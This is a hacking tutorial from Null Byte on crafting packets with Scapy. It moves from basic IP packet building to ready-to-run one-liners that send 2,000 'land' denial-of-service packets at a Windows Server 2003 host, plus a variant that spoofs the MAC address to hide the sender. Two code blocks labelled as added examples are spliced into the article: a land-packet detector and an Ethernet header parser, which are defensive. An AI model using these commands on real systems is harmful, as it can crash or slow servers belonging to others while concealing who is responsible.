How to Create New Scanning and Execution Packets with Scapy « Null Byte :: WonderHowTo



With almost any packet-crafting tool, a hacker can perform Denial-of-Service (DoS) attacks. Given the ability to craft nearly any packet with any combination of features, a hacker can usually find a packet that crashes a host or a network. Nmap and Hping are effective packet-manipulation tools, but there is also Scapy, which is almost infinitely customizable.

Customizing packets is exactly where Scapy shines compared with Nmap and Hping. That does not mean Nmap and Hping are not customizable, but their flexibility is limited, which makes deep customization awkward. Scapy, on the other hand, is almost limitlessly adaptable, although it has a certain learning curve.

Understanding TCP/IP

When using a tool such as Scapy, Nmap, or Hping, it is important to understand the structure of both the IP header and the TCP header. Without this basic knowledge of the protocols, it would be like trying to fly an F-16 into a war zone without basic flight training. It's a powerful weapon, and you might drop a bomb or two, but you're probably going to crash and burn.

You should also be familiar with the layout of the TCP header and the TCP packet:

Step 1: Start Scapy

Start Scapy by typing scapy in a new terminal window. We will use Kali Linux for this guide, which has Scapy installed by default, but it should be similar on other Linux distributions.

  ~ # scapy

INFO: PyX cannot be imported. psdump() and pdfdump() cannot be used.
WARNING: IPython is not available. Using the default Python shell instead.
AutoCompletion, History are disabled.

                    (Scapy ASCII-art banner)
                    Welcome to Scapy
                    Version 2.4.0
                    https://github.com/secdev/scapy
                    Have fun!
                    Craft packets like I craft my beer.
                    -- Jean De Clerck

>>> 

Notice the >>> prompt after the tool's banner is displayed. It indicates that Scapy is in interactive mode: everything you type from here on is interpreted by the Scapy interpreter (a Python shell with Scapy loaded).

If you do not see the above because the tool is not installed, you can install it with pip install scapy. There are also newer development versions you can try if you want.

  ~ # pip install scapy 

Step 2: Creating a Packet

The beauty of Scapy is the ability to customize every conceivable packet. Normally, the TCP/IP stack of your operating system builds an RFC-compliant packet whenever you communicate over the Internet.

As hackers, we often want to craft a unique packet that may not be RFC compliant in order to gather information about a target (as in scanning). In addition, a DoS condition can be created by crafting a packet that crashes the target system (e.g., the land attack, ping of death, fragroute, etc.).

Let's start by creating a simple IP packet. In Scapy, first declare a variable that represents your packet, then define its attributes one at a time. In my example we name the packet "x" and then give it several attributes. Define "x" as an IP packet with a TTL of 64.

  >>> x = IP(ttl=64)
>>> x

 

After creating the variable x and defining it as an IP packet with a TTL of 64, I typed the variable x again and Scapy replied with its value. In this case, the IP time-to-live equals 64.

Now let's add some additional attributes to this variable x, for example a source and a destination IP address. The syntax is similar to Wireshark or tcpdump filters. We set the source IP attribute with x.src followed by the value in double quotes ("). In my example, I use 192.168.1.101 as the source IP address.

  >>> x.src = "192.168.1.101"
>>> x

 

Then we set the destination IP attribute with x.dst followed by the value in double quotes ("). In my example, I use 192.168.1.122 as the destination IP address.

  >>> x.dst = "192.168.1.122"
>>> x

 

Note that after setting each value, I checked it by simply re-entering the variable name. At this point we have created a packet with the following attributes:

  • TTL = 64
  • Source IP address is 192.168.1.101
  • Destination IP address is 192.168.1.122

You can verify this by typing the variable name x again. Scapy returns the packet with all of its attributes listed.

  >>> x

Step 3: Viewing Built-in Functions

Scapy has a large number of built-in functions that can be listed with the command lsc(). Note the command send in the list, which is used to send a packet.

  >>> lsc()

IPID_count: Identify IP ID value classes in a list of packets
arpcachepoison: Poison the target's cache with a (MAC, victim IP) pair
arping: Send ARP who-has requests to determine which hosts are up
bind_layers: Bind 2 layers on the values of some specific fields
bridge_and_sniff: Forward traffic between interfaces if1 and if2, sniff and return
chexdump: Build a per-byte hexadecimal representation
computeNIGroupAddr: Compute the NI group address. Can take a FQDN as input parameter
corrupt_bits: Flip a given percentage or number of bits from a string
corrupt_bytes: Corrupt a given percentage or number of bytes from a string
defrag: defrag(plist) -> ([not fragmented], [defragmented])
defragment: defrag(plist) -> plist defragmented as much as possible
dhcp_request: --
dyndns_add: Send a DNS add message to a nameserver for "name" to have it resolve to "rdata"
dyndns_del: Send a DNS delete message to a nameserver for "name"
etherleak: Exploit Etherleak flaw
fletcher16_checkbytes: Calculate the Fletcher-16 checkbytes, returned as a 2-byte binary string
fletcher16_checksum: Calculate the Fletcher-16 checksum of the given buffer
fragleak: --
fragleak2: --
fragment: Fragment a big IP datagram
fuzz: Transform a layer into a fuzzy layer by replacing some default values with random objects
getmacbyip: Return the MAC address corresponding to a given IP address
getmacbyip6: Return the MAC address corresponding to an IPv6 address
hexdiff: Show differences between 2 binary strings
hexdump: Build a tcpdump-like hexadecimal view
hexedit: --
hexstr: --
import_hexcap: --
is_promisc: Try to guess if the target is in promiscuous mode. The target is provided by its IP
linehexdump: Build an equivalent view of hexdump() on a single line
ls: List available layers, or info on a given layer class or name
neighsol: Send an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with the specified IPv6 address
overlap_frag: Build overlapping fragments to bypass NIPS
promiscping: Send ARP who-has requests to determine which hosts are in promiscuous mode
rdpcap: Read a pcap or pcapng file and return a packet list
report_ports: Port-scan a target and output a LaTeX table
restart: Restart Scapy
send: Send packets at layer 3
sendp: Send packets at layer 2
sendpfast: Send packets at layer 2 using tcpreplay for performance
sniff: --
split_layers: Split 2 layers previously bound
sr: Send and receive packets at layer 3
sr1: Send packets at layer 3 and return only the first answer
sr1flood: Flood and receive packets at layer 3 and return only the first answer
srbt: Send and receive using a Bluetooth socket
srbt1: Send and receive 1 packet using a Bluetooth socket
srflood: Flood and receive packets at layer 3
srloop: Send a packet at layer 3 in a loop and print the answer each time
srp: Send and receive packets at layer 2
srp1: Send and receive packets at layer 2 and return only the first answer
srp1flood: Flood and receive packets at layer 2 and return only the first answer
srpflood: Flood and receive packets at layer 2
srploop: Send a packet at layer 2 in a loop and print the answer each time
tcpdump: Run tcpdump or tshark on a list of packets
traceroute: Instant TCP traceroute
traceroute6: Instant TCP traceroute using IPv6
traceroute_map: Utility function to call traceroute on multiple targets
tshark: Sniff packets and print them with pkt.summary(), a bit like a text-mode Wireshark
wireshark: Run Wireshark on a list of packets
wrpcap: Write a list of packets to a pcap file

Use send to send the packet "x" created above, with TTL = 64, source IP address 192.168.1.101 and destination IP address 192.168.1.122. The packet is routed to the destination IP address and may cross at most 64 hops (TTL = 64) before being discarded.

  >>> send(x)

.
Sent 1 packets.

As you can see, our specially crafted "x" packet was sent to the destination IP address. With Scapy, you can craft a packet with just about any value in any of the IP or TCP header fields: window size, flags, fragmentation fields, acknowledgement number, sequence number, and so on.

Step 4: Create an Attack

I hope you now see that Scapy can be used to manipulate every field in a TCP/IP packet. Now you can use this capability to create a malicious packet and send it to a target system.

Suppose we have found a Windows Server 2003 machine (believe it or not, there are still millions of 2003 servers), identified with Netcraft or Xprobe2. This operating system is vulnerable to the "land" attack, a DoS attack that sends an oversized packet to the target with the same source and destination IP address and the same source and destination port. The system does not always crash, but it slows down considerably. For a web server, slowing down is effectively a DoS.

To create a land attack packet, Scapy can take all the attributes in a single command. Use the following format to build the land attack packet and send it 2,000 times. In this one-liner, send is the command; IP defines the IP layer; src="192.168.1.122" is the source IP address; dst="192.168.1.122" is the destination IP address; TCP defines the TCP layer that carries the ports; sport=135 defines the source port, dport=135 defines the destination port; and count=2000 defines the number of packets to send.

  >>> send(IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135, dport=135), count=2000)

................................................................................ (one dot per packet sent)
Sent 2000 packets.

Sending these packets to a Windows Server 2003 system may crash it or at least slow it down dramatically. When a web server slows down that much, the site is effectively unavailable.
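To make the header fields from Step 2 and the land pattern from Step 4 concrete from the receiving side, here is an added example that is not part of the original article and does not use Scapy: a pure-Python encoder and decoder for the 20-byte IPv4 header and the 20-byte TCP header (with both checksums), plus a small detector that flags packets whose IP source equals the destination and whose TCP source port equals the destination port, which is the signature a firewall or IDS rule looks for. All function names and the sample packets are constructed for this example.

```python
import socket
import struct

# Added example (not from the article): minimal IPv4 + TCP header
# encoder/decoder in pure Python and a detector for the land pattern
# (IP src == dst and TCP sport == dport).  Names and sample packets are
# constructed for this example; they are not Scapy APIs.

IP_PROTO_TCP = 6
TCP_SYN = 0x02


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, ttl=64, flags=TCP_SYN, seq=0, window=8192):
    """Encode a 20-byte IPv4 header followed by a 20-byte TCP header (no options, no payload)."""
    src_b, dst_b = socket.inet_aton(src), socket.inet_aton(dst)
    # TCP header: data offset 5 (20 bytes), checksum field zeroed for now.
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, window, 0, 0)
    # The TCP checksum also covers a pseudo-header: addresses, zero, protocol, TCP length.
    pseudo = src_b + dst_b + struct.pack("!BBH", 0, IP_PROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4 header: version 4, IHL 5, no fragmentation, checksum zeroed first.
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, ttl, IP_PROTO_TCP, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Decode the IPv4 header and, if the payload is TCP, the TCP header."""
    ver_ihl, _tos, total_len, ident, _frag, ttl, proto, _csum, src_b, dst_b = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    fields = {
        "version": ver_ihl >> 4,
        "ttl": ttl,
        "proto": proto,
        "id": ident,
        "src": socket.inet_ntoa(src_b),
        "dst": socket.inet_ntoa(dst_b),
        # A correct header sums to zero when the checksum field itself is included.
        "ip_checksum_ok": checksum(pkt[:ihl]) == 0,
    }
    if proto == IP_PROTO_TCP and len(pkt) >= ihl + 20:
        sport, dport, seq, ack, _off, tflags, window, _tcsum, _urg = struct.unpack(
            "!HHIIBBHHH", pkt[ihl:ihl + 20])
        segment = pkt[ihl:total_len]
        pseudo = src_b + dst_b + struct.pack("!BBH", 0, IP_PROTO_TCP, len(segment))
        fields.update({
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": tflags, "window": window,
            "tcp_checksum_ok": checksum(pseudo + segment) == 0,
        })
    return fields


def is_land_packet(fields: dict) -> bool:
    """True when a TCP packet has identical source/destination address and port."""
    return (fields.get("proto") == IP_PROTO_TCP
            and fields["src"] == fields["dst"]
            and fields.get("sport") is not None
            and fields["sport"] == fields["dport"])


def find_land_packets(packets):
    """Return the indexes of the raw packets that match the land pattern."""
    return [i for i, raw in enumerate(packets) if is_land_packet(parse_ipv4_tcp(raw))]


# Constructed sample traffic: one ordinary SYN and one land-pattern packet,
# using the addresses and port from the article.
SAMPLE_PACKETS = [
    build_ipv4_tcp("192.168.1.101", "192.168.1.122", 40000, 80),
    build_ipv4_tcp("192.168.1.122", "192.168.1.122", 135, 135),
]

if __name__ == "__main__":
    for i, raw in enumerate(SAMPLE_PACKETS):
        f = parse_ipv4_tcp(raw)
        verdict = "LAND" if is_land_packet(f) else "ok"
        print(i, f["src"], f["sport"], "->", f["dst"], f["dport"], "ttl", f["ttl"], verdict)
```

The detector deliberately checks the decoded fields rather than raw byte offsets, so it keeps working on packets with IP options (IHL greater than 5); the checksum flags are there because a crafted packet with a bad checksum is dropped by the receiving stack before any of this matters, so a capture full of land-pattern packets that also fail the checksum is noise rather than a threat.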

Step 5: Spoofing the MAC Address

The one problem with what we did above is that we exposed our own MAC address. I'm sure I don't need to tell you why that is a problem, but a MAC address identifies the manufacturer of your device and can reveal that you are not who you claim to be.

The send function sends packets at layer 3, so the operating system does the routing and the layer 2 framing for you. sendp, however, works at layer 2. Thanks to Null Byte user Triphat, who suggested the following command using the latter function.

Same steps as in Step 4, but with a spoofed MAC address: sendp is the command; Ether indicates an Ethernet layer (so this only works on the local LAN); src="aa:bb:cc:dd:ee:ff" is the fake source MAC address; IP defines the IP layer; src="192.168.1.122" is the source IP address; dst="192.168.1.122" is the destination IP address; TCP defines the TCP layer that carries the ports; sport=135 defines the source port, dport=135 defines the destination port; and count=2000 defines the number of packets to send.

  >>> sendp(Ether(src="aa:bb:cc:dd:ee:ff")/IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135, dport=135), count=2000)

................................................................................ (one dot per packet sent)
Sent 2000 packets.

To see what this looks like from the target's side, watch the video above, which shows the packets captured in Wireshark and how they appear.
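The Ether() layer that sendp sends is the 14-byte Ethernet header that arrives at the target's NIC. As an added example that is not part of the original article and does not use Scapy, the following pure-Python code parses that header and reports the two properties of the source MAC that a defender reviewing a capture looks at: the vendor prefix (OUI) mentioned above, and the locally-administered bit, which is set in the article's aa:bb:cc:dd:ee:ff and means no registered vendor is behind the address. The function names and the sample frames are constructed for this example, and the findings are heuristics to correlate with other evidence, not proof of spoofing.

```python
import struct

# Added example (not from the article): Ethernet header encode/decode and
# a heuristic check on the source MAC.  Names and sample frames are
# constructed for this example; they are not Scapy APIs.

ETHERTYPE_IPV4 = 0x0800


def mac_to_str(raw: bytes) -> str:
    """Render raw MAC bytes as colon-separated lowercase hex."""
    return ":".join("%02x" % b for b in raw)


def mac_from_str(text: str) -> bytes:
    """Parse 'aa:bb:cc:dd:ee:ff' or 'aa-bb-cc-dd-ee-ff' into 6 bytes."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def build_ethernet(dst: str, src: str, ethertype: int, payload: bytes) -> bytes:
    """Encode destination MAC, source MAC and EtherType, then append the payload."""
    return struct.pack("!6s6sH", mac_from_str(dst), mac_from_str(src), ethertype) + payload


def parse_ethernet(frame: bytes) -> dict:
    """Decode the 14-byte Ethernet II header and classify the source address."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    first_octet = src[0]
    return {
        "dst": mac_to_str(dst),
        "src": mac_to_str(src),
        "ethertype": ethertype,
        # First three octets are the vendor OUI for universally administered addresses.
        "src_oui": mac_to_str(src[:3]),
        # Bit 1 of the first octet: locally administered, i.e. no registered vendor.
        "src_locally_administered": bool(first_octet & 0x02),
        # Bit 0 of the first octet: group/multicast; a unicast sender never sets it.
        "src_multicast": bool(first_octet & 0x01),
        "payload": frame[14:],
    }


def source_mac_findings(frame: bytes) -> list:
    """Heuristic observations about the source MAC of one frame (signals, not proof)."""
    info = parse_ethernet(frame)
    findings = []
    if info["src_multicast"]:
        findings.append("multicast bit set in source MAC (invalid for a sender)")
    if info["src_locally_administered"]:
        findings.append("locally administered source MAC (no vendor OUI; "
                        "typical of randomized or hand-set addresses)")
    return findings


# Constructed sample frames with an empty payload: the article's spoofed MAC
# and an ordinary universally administered address.
SPOOFED_FRAME = build_ethernet("ff:ff:ff:ff:ff:ff", "aa:bb:cc:dd:ee:ff", ETHERTYPE_IPV4, b"")
NORMAL_FRAME = build_ethernet("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", ETHERTYPE_IPV4, b"")

if __name__ == "__main__":
    for name, frame in (("spoofed", SPOOFED_FRAME), ("normal", NORMAL_FRAME)):
        info = parse_ethernet(frame)
        print(name, info["src"], "oui", info["src_oui"], source_mac_findings(frame))
```

A locally-administered source MAC is common on its own (virtual machines, containers and privacy-randomizing clients all use them), so the useful signal is the combination: a locally-administered MAC together with an IP source that belongs to another host on the segment, or with a land-pattern packet, is what merits a closer look.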

Scapy is another robust scanning and DoS tool in the hacker's arsenal. It is incredibly versatile, so you can perform many tasks with a single tool. It is virtually unlimited in its ability to craft packets with any imaginable features, enabling unique scanning techniques and DoS attacks.

Cover image via Shutterstock; screenshots by OTW/Null Byte
